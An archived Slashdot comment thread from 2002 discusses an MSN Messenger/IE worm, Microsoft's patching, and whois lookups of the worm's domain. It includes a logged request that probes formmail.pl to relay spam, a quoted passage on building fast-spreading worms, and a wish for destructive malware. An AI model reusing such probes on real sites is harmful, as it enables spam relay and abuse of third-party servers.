Boy, I sure wish I was getting $100K/year. Oh well. Anyway, that equation is not quite correct, because

1. It shouldn't take 10 programmers to fix that flaw. Maybe one programmer, one tester. Two people.
2. Those people are going to get paid anyway. It's not like they're hired on the spot to fix those problems. They're already on the payroll, and fixing bugs is part of the job description.
3. The time it takes to fix is only relelvant if it affects other work. This is not always the case (not that it doesn't affect other work, but that it doesn't significantly hurt the other work in terms of slipping on a timeframe).
4. The equation is typically a*b > c, they don't fix it, not a*b*c > some arbitrary number. In the Fight Club case, c was the cost of litigation (including settlements). In your example, it would be lost revenue. I'm not so sure that's a good measure, here, since IE is free.

Of course, this applies to pretty much every business, not just Microsoft.

Re:interesting article on the reg

[targo]

And of course, MS has known about this since december :-P


Yes, and there has been a patch for this problem. So what did you expect MS to do? Spam all the IM users to install the patch? C'mon.
Btw, WindowsUpdate prompts you to install this patch, I don't see what else should have been done about it ("this bug should not have been there" rants don't count as a solution).

Re:interesting article on the reg

True true... I probably should have been more scientific and actually created a formula. :)

Not just jabbered.

Re:interesting article on the reg

It was found, it was fixed when it was found, the was posted. If people don't patch their own machines, how is MS supposed to fix that? Like any piece of buggy OS crap does any better? You need to read outside the /. universe once or twice. I suggest security focus for one. MS hardly has the monopoly on bugs. And once again, IT WAS FIXED WEEKS AGO!

Re:interesting article on the reg

Sorry, you are wrong. This is not the free-wheeling world of open source we are talking about here that runs in build-and-fix mode.

1. You can't assume it won't take 10 programmers.
2. What, they are on payroll and just sit around with no work other than fixing bugs? No other projects that might have a priority?
3. Slipping a timeframe in a publicly traded company can affect how they report revenues. Can't report revenues of money collected on a product that hasn't been released.
4. IE is free to the end user, but not free to create. It does take time to build and package, even if the fix takes 10 minutes.

Before you apply business rules to an industry, you should work in that industry.

Re:interesting article on the reg

[ahde]

IE cost me 150 bucks. Plus, I need to pay $50 a month just to install patches.

Re:interesting article on the reg

[tswinzig]

And of course, MS has known about this since december :-P

Perhaps that is why a patch is already available which fixes this problem? (And has been available for a while.)

Re:interesting article on the reg

I work for microsoft and we got an email this morning from the security group telling us it was a mandatory update...

-Sam

Re:interesting article on the reg

[sam_handelman]

"this bug should not have been there" rants don't count as a solution

You're artificially restricting the sphere of possible solutions to things that might help, which is intellectually honest. Shame on you.

In ancient Sumeria, they used to execute architects when the buildings that they constructed collapsed. By the same token, we should kill some people.

If we've learned one thing from the 20th century, it is that big government is inefficient. Therefore, the killings should be handled by the private sector.

The proceedings against MS are criminal, in addition to civil. In a criminal proceeding, the judge is perfectly justified in issueing fatwas against MS programmers who write buggy code - this is a well established precept of Sharia.

Thus, I've proven that the free market will take care of MS on it's own, punishing it for buggy programming - through highly paid mercenary assassins, with EULAs to kill.

I want to test and see if anyone reads their EULAs. Distribute a piece of software with an EULA that says, about halfway through-
"By installing this software, you agree to take up arms in defense of (company name), march to the fastness of her foe, and slaughter her enemies. Please register the software so that we can give you your orders."

Re:interesting article on the reg

[Osty]

Sorry, you are wrong. This is not the free-wheeling world of open source we are talking about here that runs in build-and-fix mode.

1. You can't assume it won't take 10 programmers.

I can, I will, and I did assume so. You obviously don't understand how large software projects are typically managed -- single people each own various different pieces. Likely, there's one or two guys that own the document.object piece of the scripting engine used by Internet Explorer, and those are the guys that would be tasked with fixing this. Tack on one tester to make sure it works, and maybe one program manager to document the problem/fix, and you come up with 4, maybe 5 people.

2. What, they are on payroll and just sit around with no work other than fixing bugs? No other projects that might have a priority?

Yes, they're on the payroll. No, they don't just sit around with no work other than fixing bugs. However, bugfixing is part of the job description. It needs doing. Most bug fixes generally are not very time consuming. The most time consuming part of fixing bugs is getting a valid repro. After that, in 90% of the cases, it's changing maybe one or two lines of code. The repro has already been done. Check BugTraq. That means the programmers just have to reproduce this in a lab, track it down, fix the problem, and hand it off. Two, maybe three days of work, tops. Highly unlikely that'll affect a different project, unless that project is already in ship mode. (In which case, you leverage one of your other developers who has a few free cycles.)

3. Slipping a timeframe in a publicly traded company can affect how they report revenues. Can't report revenues of money collected on a product that hasn't been released.

Red herring, per #2 above.

4. IE is free to the end user, but not free to create. It does take time to build and package, even if the fix takes 10 minutes.

Builds happen every single day at Microsoft (that's why you see large version numbers, like Windows 2000 was 5.0.2195). The infrastructure is already there, it's just a matter of using it. Packaging is generally done in the build process. Ship it off to Windows Update, let them deal with it afterwards. This is typical for most software development houses.

Before you apply business rules to an industry, you should work in that industry.

I do work in the industry. Do I have your permission now?

Re:interesting article on the reg

Sam, how can you look at yourself in the mirror every morning? I mean, is it the money that makes it bearable, or are there just a lot more hot stupid chicks in Redmond that the rest of us don't know about?

Re:interesting article on the reg

[the+phantom]

Rather, architects were executed if their buildings collapsed and killed the owner. If the owner's son was killed, then the architects son was executed. Lex talionis.

But I'm WAY offtopic.

Re:interesting article on the reg

[Error27]

>>Yes, and there has been a patch for this problem. So what did you expect MS to do? Spam all the IM users to install the patch?

Maybe they could send an email that describes the problem and the fix.

Also they could put a link on microsoft.com or create a site called security.microsoft.com.

These things are fairly common from companies that don't treat their customers like dirt.

Re:interesting article on the reg

[Sklivvz]

The patch does not work!!!! See here!

thanks bill.... :-(

Re:interesting article on the reg

[Alsee]

If the owner's son was killed, then the architects son was executed.

Then I guess you kill the owner if the architech is the the owner's father, hehe.

-

Re:interesting article on the reg

[randomgeek]

You mean like this or this?

Re:interesting article on the reg

[KnightStalker]

If we've learned one thing from the 20th century, it is that big government is inefficient. Therefore, the killings should be handled by the private sector.

Actually, I believe the 20th century taught us that big government is only efficient at the task of killing people.

Re:interesting article on the reg

[juan2074]

Too funny! Unfortunately, I have no mod points to give.

Re:interesting article on the reg

[Error27]

Those links are not useful.

Compare them to something like security.debian.org or redhat.com/errata/ or sunsolve.sun.com/security. These links give information about what programs had security problems.

The first link you provided doesn't seem to have any useful information. The second link is too hard to remember. It also doesn't give any useful information.

The correct link if you want Microsoft security information is:
http://www.microsoft.com/technet/treeview/defaul t. asp?url=/technet/security/current.asp

I think that the fact you couldn't find the correct link proves my point that Microsoft needs to have a site dedicated to providing security information for their products.

Kinda funny..

[jfroot]

I get this message from this girl I kindof like on MSN saying to go to this URL urgently. So I do (duh!). Turns out it is a porn site.. So I'm thinking what is this girl saying? Is she dropping some no so subtle hints? As I ponder this I get a MSN message from my mom asking me why I sent her a link to a porn site.. then I understood..

Re:Kinda funny..

Why did you send your mother a link to a porn site?

Re:Kinda funny..

Cartman, you're mother's on the cover of Crack-Wh0re Magazine!

Re:Kinda funny..

[Intel86]

Getting porn links isn't what bothers me, it's sending them to your ex-g/f who you have blocked in your MSN Contacts.

Re:Kinda funny..

Dude, tell your mom to stop sending me pr0n links.

Warhol? worm

[blkros]

The worm seems to be named because of a quote that the site attributes to Andy Warhol.(ie. 'in the future everyone will have his 15 minutes of fame.') That quote should actually be attributed to Marshal MacLuhan, who Andy ripped it off from. So these worms should be name MacLuhan worms.

Re:Warhol? worm

How do you think Andy got his 15 min of fame? By ripping off that quote, the guy who originally said it also got 15 min somewhere to. Kind of ironic, eh?

Re:Warhol? worm

Well, McLuhan did talk about that whole "The Medium is the Message" thing ... perhaps, in some twisted way, this signifies that Microsoft products are viral?

Re:Warhol? worm

[foghorn19]

The correct name is Marshall McLuhan.

Re:Warhol? worm

[hayden]

So these worms should be name MacLuhan worms.

And that is why he chose to attribute it to Warhol.

Re:Warhol? worm

[interiot]

Where's my "+1, Ironic" mod when I need it?

Re:Warhol? worm

The correct name is Marshall McLuhan

Thanks a few bllion, dude. I'd never have guessed who he was talkig about without your fine and welcome help. They didn't really send you to /. to learn to spell, did they?

Re:Warhol? worm

[d314]

Warhol seemed to create 'found art.' I'd give the phrase to him.

:o

[bender183]

i think the biggest implication of this is what the poster originally posted. If m$ is going to make messaging a corner stone of thier .NET project the potential for a more advanced virus than this one could really mess sh*t up. :o

Not so sure the story is accurate.

[einhverfr]

The page appears to post a hidden form with your email information to the page. I suspect that it may be a contact gatherer for spammers (a new low...) though it could have done much more.

FormMail.pl is the perl script which recieves this information. It is pretty interesting...

Re:Not so sure the story is accurate.

[brain159]

quite probably unrelated to this is a few days ago my website got hit by some apparent script which was searching for "open" formmail.pl scripts to abuse by trying to send an email off to some random guy (I guess formmail.pl is fairly standard - the owner of the site whose script is being used may be an innocent relay in the warhol worm/virus). Here's the apache log line of when my site was scanned, just in case anyone else has spotted similar:

24.90.121.snip - - [12/Feb/2002:00:38:16 -0500] "GET /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject= bbx%2Eflarp%2Enet%2Fcgi%2Dbin%2Fformmail%2Epl&reci pient=icases0ber%40aol%2Ecom&msg=w00t HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 295 "-" "Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"

It's RoadRunner cable modem service apparently, and the browser info is obviously going to be rubbish.

It's really an IE virus

[_fuzz_]

The MSN Messenger protocol has nothing in it that would allow the retrieval of contacts, etc. (I've implemented a Java library that speaks msn messenger: MSNj (shameless plug)). The protocol isn't any more or less secure than HTTP.

The virus probably just gets the COM object that their messenger implements through javascript. The security hole is that IE lets a web page talk to the messenger client. I would guess that it does that so you can add contacts by clicking on web links and stuff like that.

Re:It's really an IE virus

It's really an IE virus that uses MSN as an infection platform. The tight integration between the two makes an exploit like this easy to use. This is an IE hole.. And MSN is what's spreading it to your computer.

Or, more accurately, spreading it past your computer.. The user, of course, is ultimately at fault (so what else is new).

Re:It's really an IE virus

Hey, that's cool. Thanks for the link.

Re:It's really an IE virus

[ethereal]

The user is not at fault. Don't blame the victim. There is no reason that following a link to a web page should divulge that kind of personal information about me and my contact list. This is a flaw in the user's software in that it violates the principle of least surprise - it doesn't do what you'd expect it to do.

Finally!

[digitalcowboy]

I've been reluctant to use the MS IM client because it didn't appear they had fully integrated it's virus abilities with all their other software. Now that it's part of a fully integrated Microsoft Virus Productivity Suite, I'm ready!

Can anybody tell me where I can sign up for one of those Passport Universal Identifier and Cybercash Wallets and get the MS implant in my right hand or forehead?

Re:Finally!

Now I understand what .NET is. Write a virus once and it will run it anywhere .NET is running.

Re:Finally!

I'm writing a virus to steal your forehead right now...

Re:Finally!

[archen]

With MS you don't get it on your hand or your forhead, you take it in the rear.

It works by:

using the document.open bug in IE. Details of which were first published Here Users of third party clients are not affected -H2

Microsoft Article Virus Sweeps Slashdot

[guttentag]

Four entries in the Microsoft topic in one day?

1. Microsoft Instant Messenger Virus Sweeps Net
2. What is .NET?
3. States Demand Windows Source Code
4. Details of MSFT's Antitrust Lobbying

There were none yesterday, or the day before... the calm before the storm...

Re:Microsoft Article Virus Sweeps Slashdot

Actually I'd like to know why this is of any issue to slashdotters at all. I mean it's begining to look like slashdot is nothing more that a microsoft news site. Who gives a flying fuck?

Re:Microsoft Article Virus Sweeps Slashdot

[MoneyT]

All of us self made, armchair warrior, microsoft bashers care. We like finding flaws in M$ systems. It isn't that we don't acknowledge our own system's flaws, it's that we find it funny that the OS with quite possibly the biggest and highest paid dev team has some of the most easily exploited bugs. For such a "user friendly" system, all these "on by default" setups seem to be counter productive to users.

And what exactly is a flying fuck?

Re:Microsoft Article Virus Sweeps Slashdot

And what exactly is a flying fuck?
Like a duck, and a welsh farmer...

Re:Microsoft Article Virus Sweeps Slashdot

[Tony-A]

It might be the only microsoft new site that's actually worth anything, but well under 10 percent of /. is Microsoft related.

Re:No DNS Record? (Geeky Observations)

[jfroot]

Just go to the registrar www.godaddy.com:

MASENKO-MEDIA.NET WHOIS results:

The data contained in Go Daddy Software, Inc.'s WHOIS database,while believed by the company to be reliable, is provided "as is"with no guarantee or warranties regarding its accuracy. Thisinformation is provided for the sole purpose of assisting youin obtaining information about domain name registration records.Any use of this data for any other purpose, including, but notlimited to, allowing or making possible dissemination orcollection of this data in part or in its entirety for anypurpose, such as the transmission of unsolicited advertising andsolicitations, is expressly forbidden without the prior writtenpermission of Go Daddy Software, Inc. By submitting an inquiry,you agree to these terms of usage and limitations of warranty.Registrant: Net Crater NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States Registrar: Go Daddy Software (http://registrar.godaddy.com) Domain Name: MASENKO-MEDIA.NET Created on: 06-Feb-02 Expires on: 06-Feb-03 Last Updated on: 06-Feb-02 Administrative Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Technical Contact: Crater, Net domains@netcrater.com NetCrater 502 Summit ST Walnut Cove, North Carolina 27052 United States 3365917696 Domain servers in listed order: NS1.NETCRATER.COM NS2.NETCRATER.COM

Re:No DNS Record? (Geeky Observations)

You fucking moron! The domain record applies to the domain only.

whois masenko-media.net

It's only a matter of time...

[Max+the+Merciless]

until someone unleashes a virus that does some serious damage. If I was a "terrorist" hell bent on punishing the Western world for whatever percieved sins, I'd be learning how to make, or hiring programmers, to unleash a truely destructive virus.

It's been said many times before, but I'll say it again, any monoculture is far more vulnerable to attack than a diverse system. Relying on one system, be it Microsoft or even Linux, is foolish.

The destruction of the Microsoft monopoly is not just a matter of helping improve competition, it is a serious security matter. No amount of campaign donations or legal semantics should distract the government from its task of providing security.

Re:It's only a matter of time...

Get real!

Re:It's only a matter of time...

[Cro+Magnon]

One advantage of Linux is that it ISN'T a monoculture. If you write a virus/worm/exploit for OutHouse Express, you know it's on all 200 million Doze machines. If you write an exploit for Konqueror, it won't bother that RedHatter with the "KDE sux" tee-shirt. Depending on the software installed, a RedHat specific worm might not do diddly to a Slack box.

Re:No DNS Record? (Geeky Observations)

$ whois masenko-media.net

It's a microsoft ruse!

[SweetAndSourJesus]

Fired up Messenger for the first time ever, just hoping I get to see this. It's all a microsoft conspiracy to get slashdotters using their product.

worm primer

[elbobo]

just gave it a go, and it didn't affect me. running winxp with netcaptor browser (embeds ie) and trillian (im client that connects to the msn messanger network among others)

not that i was expecting it to work.

what amuses me though, is how the linked page from this article reads like a very handy worm writing primer, suggesting better propogation methods -

Optimized scanning routines, hitlist scanning, and permutation scanning can be combined to produce hyper virulent Warhol Worms. Since they are so fast, such worms would be the vehicle of choice for delivering malicious payloads to the net at large.

Re:worm primer

[kyhwana]

Netcaptor. Hmm, looks interesting.
Ohwait, $30US for tabs in IE.
WOW! When you can get the same for mozilla and opera for free. Windows users must really be suckers.

Re:worm primer

[elbobo]

mozilla still has its quirks that disqualify it as a day to day browser for me. but don't fret - i check every release, and the latest has come very close to replacing netcaptor. there's more to netcaptor than just tabbed browsing though.

Re:worm primer

[filmcritic]

Yes! You can have that bloated, buggy, next-to-dead mozilla hunk of shit and have it bring down the entire OS when it crashes. Linux users really have to love running that kind of stuff because its FREE!!!! CmdrTaco sez: "you get what you pay for"

This is dumber than a mail worm

[J.D.+Hogg]

I would be impressed to see a worm silently infect your machine and try to infect your contacts. But this one asks you a *click a url* ?? Anybody who doesn't dismiss a message with a URL or an attachment from somebody they don't know, whether it's in an instant message or an email, deserves to be infected (and also should have their computers taken away from them and a flyer explaining them why they shouldn't talk to strangers in the street given to them instead).

But /. is right, it is a Warhol virus : all the posters who reported this non-news got their 15 minutes of fame on Slashdot.

Re:This is dumber than a mail worm

[joemiah]

It spreads through your contacts, so the recipients are more than likely receiving the URL from someone they know.

Re:This is dumber than a mail worm

[CrayzyJ]

"somebody they don't know"

It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever.

Re:This is dumber than a mail worm

[J.D.+Hogg]

"It says that the virus sends the msg to people in the contact list. Hence, you'd get messages from your friends/family/whatever."

Ah yes, I didn't see that, my fault. Still though, I got emails from friends with a strange vague "Go there it's cool" line, and that sounded odd enough that I didn't open them (i.e. it didn't sound like it came from that person, and even if it could have, it was too impersonal to be true). Turned out to be from an Outlook virus when I checked later.

Re:This is dumber than a mail worm

[LPetrazickis]

a flyer explaining them why they shouldn't talk to strangers in the street given to them instead What's wrong with talking to strangers? I have not ended up in a dark van as of yet.:)

Re:This is dumber than a mail worm

This particular system may be dumb, but for the sake of it lets think out of the box a little, if you can get at someones email addresses etc. just by writing a simple script on a web page whats to stop people doing the same thing on there home pages, or even big businesses. Your not going to know its happening and they could be up to anything they wanted.

Browsing the web would become a lot more interesting if that was the case don't you think ;)

Re:This is dumber than a mail worm

[matrix29]

I would be impressed to see a worm silently infect your machine and try to infect your contacts. But this one asks you a *click a url* ??

Which bring up this obvious chuckle...

This is an Amish computer virus. Please pass this message along then format your hardrives. Thank you.

Not that URL

[phliar]

Was that just an example URL?

GET /cool.html HTTP/1.1
Host: www.masenko-media.net
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Win32)

HTTP/1.1 404 Not Found
Date: Thu, 14 Feb 2002 00:07:30 GMT
Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8 PHP/4.0.6 DAV/1.0.2 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /cool.html was not found on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>Apache/1.3.20 Server at www.masenko-media.net Port 80</ADDRESS>
</BODY></HTML>

(No Micros**t anywhere on these machines. Cheers!)

Re:Not that URL

FrontPage/5.0.2.2510 FrontPage == Microsoft;

Re:Not that URL

[jonnythan]

I believe he meant no Mircosoft products on his own computer, so he could follow the link without fear.

Re:Not that URL

[Saint+Nobody]

Server: Apache/1.3.20 (Unix) mod_bwlimited/0.8

hmmm.... well, i'm not really familiar with mod_bwlimited, but it sounds like a module for limitimg the bandwidth used by certain pages. (correct me if i'm being an idiot.)

assuming i'm right, this really wasn't the place to put virus code. even though it's only a smallish html document, all the hits you can get from a virus would really add up. so you've already limited the spread of the virus. although, i'd bet it's just free web space, and <aphorism>beggars can't be choosers</aphorism>

Re:Not that URL

Then why all the server replies? What's the point?

Re:Not that URL

Check this: FrontPage/5.0.2.2510

404 error

[skt]

I suggest not following the link.

hmm, I went to that link and got a 404 error.. nothing to worry about if you use mozilla, but how can this do something bad to IE? Did they take the page down?

Re:404 error

[csmiller]

They could use the Browse-ID string to send back a 404 to non-MS browsers. Anyone brave enought to try this on a MS browser, or change their browser's ID string to check?

However, a reputable ISP would remove any account (homepage/email etc) used for spamming/virus attacks. I haven't checked the site myself (using a Uni's Win2000 box, with MSN messager installed), and don't want to get into trouble for knowingly releasing it on thier machines.

Re:404 error

[thilmony]

funnier yet, the 404 I get shows:

Apache/1.3.20 Server at www.masenko-media.net Port 80

Re:No DNS Record? (Geeky Observations)

[bovinewasteproduct]

You might try just the domain name. Which comes out to:
Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02
Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Looks fine to me..:)

BWP

Read my post, nuff said

[(startx)]

mbrennek@spaceheater:~$ host www.masenko-media.net
www.masenko-media.net. is an alias for masenko-media.net.
masenko-media.net. has address 66.96.247.55
mbrennek@spaceheater:~$ whois masenko-media.net

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

Found InterNIC referral to whois.godaddy.com.

The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

other crap added below to avoid "postercomment" compression filter, because obviously compression isn't a way to catch the real trolls, since it caught me, but hasn't caught the ascii art allready attached to the story. 45908-6230569laksdflkjn ;l34j65] lksdjflkaj -908ausdfg0 oi;3lkj4;6lkn3 56;o38tusap[df8u opsiajd ;alskdjtl3k4jl5kj345;1l 4jlwkjf l;kj a
Hope that's enough to get it through the filter this time.

Re:No DNS Record? (Geeky Observations)

How about using whois correctly?

$ whois masenko-media.net
[whois.crsnic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

and then if you ask specifically from that registrar:


[whois.godaddy.com]
The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

Re:No DNS Record? (Geeky Observations)

[The+Salamander]

Your WHOIS must suck:

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696

Domain servers in listed order:
NS1.NETCRATER.COM
NS2.NETCRATER.COM

One shoe drops

Well, this is one of a number of Damoclean swords hanging over the Net. A couple of other widely predicted "what if..?"s have already come to pass: Nimda was the first successful implementation of one, attacking through multiple vulnerabilities; others would include yesterday's SNMP freakout, the separate possibility of routing protocol attacks, yadda yadda, oh look... you all read bugtraq|incidents|nanog, et al., and know the score, and are presumably not very vulnerable. (Although one especially interesting aspect of this and other worms is that it defeats the security posture that says "take yourself out of the top 10% of easy sites to break into [by, eg., ONLY implementing the SANS top 10/20 fixes] and the kiddies will pass you by". If you're vulnerable, you WILL be hit. ) "But I haven't got anything worth taking, why would anyone want to crack me?" *sigh*...

The thing that gets me is that NOTHING MAKES ANY DIFFERENCE. Web defacements - make no difference. ILoveYou - no effect. Melissa: nada, Nimda - plus ca change, plus ca la meme chose. Code Red? code schmed. The PHBs seem quite happy to just reformat, reinstall, count it as a cost of doing business on the net, and forget any lessons less stupid people might learn.

Don't believe me? check out the IIS curve at Netcraft . What happened after Nimda and Code Red? IIS usage INCREASED.

Mebbe I'm just bitter cos I'vre been trying to break into info-sec work for the last few years and getting nowhere cos I haven't an MCSE|CCNA|CISSP|security clearance, although I can usually spot half a dozen glaring holes in a setup within a few hours. (actually I interviewed at a "leading security firm" once & was given an automated test: I couldn't help noticing the machine I was given was logged in as NT Domain Admin. No, it wasn't a double-bluff test of my ethics!)

Er... well, yes, I AM bitter; but that doesn't change the fact that there are an awful lot of clueless gimps out there managing (techs who manage) networks and network-connected systems.
It seems to me that nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts - their wallets - to make any difference to the importance placed on info-sec in the vast majority of places.

Re:One shoe drops

You sound like your actually suggesting that someone write one. Course if everyone dropped IIS/IE tomorrow, 25 bugs in Apache/Netscape would be found and exploited overnight. Methinks you haven't actually formulated any real thoughts about the subject and what the solutions might be...

Re:One shoe drops

[rjamestaylor]

• Don't believe me? check out the IIS curve at Netcraft [netcraft.com] . What happened after Nimda and Code Red? IIS usage INCREASED.

IT purchasing decisions are made by people who are insulated from these problems but not from IT advertising. Ergo, this kind of problem has little to no effect on the IT market.

Re:One shoe drops

Windows is the best product for businesses. They'd switch if there were an alternative. Businesses hire dumb people, they're cheaper. Dumb people can use Windows, little or no training required. Lots of dummies means a large base of software available.

IMO... Apple's OS X is the ticket. Dummies can use it and its a fairly secure package. Sadly, it costs too much for the business drones and the software base isn't there yet. You want things to change? Go out and buy an Apple G4 and run OS X. You can live MicroSoft free, at least at home. Don't support them, don't run their crap. Maybe at work you don't have a choice, but at home you do.

Re:One shoe drops

[tranman]

Actually, you've got it wrong. Window server popularity is continuting to decline it's just that you can't see it because unlike stock prices - which react to opinion in realtime, purchasing and install happens in bloated corporation time. All these problems will hurt windows sales in two years. Which is why Microsoft is working it's ass off to staunch the bleeding. The problem is that there because of the way it develops software, it has more holes in it's code than in a heroin junkie's arm.
And it's not that they developed it badly. It's just that it's been cost effective to not exhaustively test and not exhaustively design. With these security problems everywhere, and with potential lost sales -- this has to change.

Re:One shoe drops

[filmcritic]

Well, this is one of a number of Damoclean swords hanging over the Net.

Perhaps all the "sky is falling" people could be a bit quick on the trigger. Everyone thinks that virii and worms are/will be the downfall of the internet. The internet is much more resiliant than people think, for one major reason: the people behind it. The people that run the servers online know what to do when business needs require a server to be up and running. They don't have time to fiddle and play around with the thing just to say they fixed it the RIGHT way (like good linux users do).

..nothing short of a totally 100% evil malware that nukes HDs after silently & terminally corrupting backups for a few weeks will hit enough people where it counts..

You know what those folks will do if that happens? Suck it up and start over from scratch. There's nothing else to do. Reformat/reinstall, believe it or not, happens a lot. It's just more cost effective than correcting all the damage. Businesses exist to make money, not lose it. I know this is pretty radical to those who think everything should be given away.

The real world is quite an eye opening experience for those sitting behind the jaded curtain of linux. The author mentioned he's trying to get into the IS world and getting nowhere due to the lack of MCSE, etc certs. Yep, that's how it is. Like it or not, if you want to stand a better chance of scoring a job, you better know microsoft and have the certs because most businesses use MS internally, and they want to see certification. It's nice to see businesses who will take a chance on someone who doesn't have all the credentials, but those are few.

To finish...the sky isn't falling, the internet will go on. Crackers and script kiddies will never stop trying, but they won't break it. Think "real world" and you'll feel better.

Re:No DNS Record? (Geeky Observations)

whois is for domain names, not host names. Removing the www gives the correct info.

whois masenko-media.net
[whois.crsnic.net]

Whois Server Version 1.3

Domain names in the .com, .net, and .org domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MASENKO-MEDIA.NET
Registrar: GO DADDY SOFTWARE, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.NETCRATER.COM
Name Server: NS2.NETCRATER.COM
Updated Date: 06-feb-2002

>>> Last update of whois database: Wed, 13 Feb 2002 17:06:43 EST

The Registry database contains ONLY .COM, .NET, .ORG, .EDU domains and
Registrars.

[whois.godaddy.com]
The data contained in Go Daddy Software, Inc.'s WHOIS database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose, including, but not
limited to, allowing or making possible dissemination or
collection of this data in part or in its entirety for any
purpose, such as the transmission of unsolicited advertising and
solicitations, is expressly forbidden without the prior written
permission of Go Daddy Software, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty.

Registrant:
Net Crater
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States

Registrar: Go Daddy Software (http://registrar.godaddy.com)
Domain Name: MASENKO-MEDIA.NET
Created on: 06-Feb-02
Expires on: 06-Feb-03
Last Updated on: 06-Feb-02

Administrative Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
Walnut Cove, North Carolina 27052
United States
3365917696
Technical Contact:
Crater, Net domains@netcrater.com
NetCrater
502 Summit ST
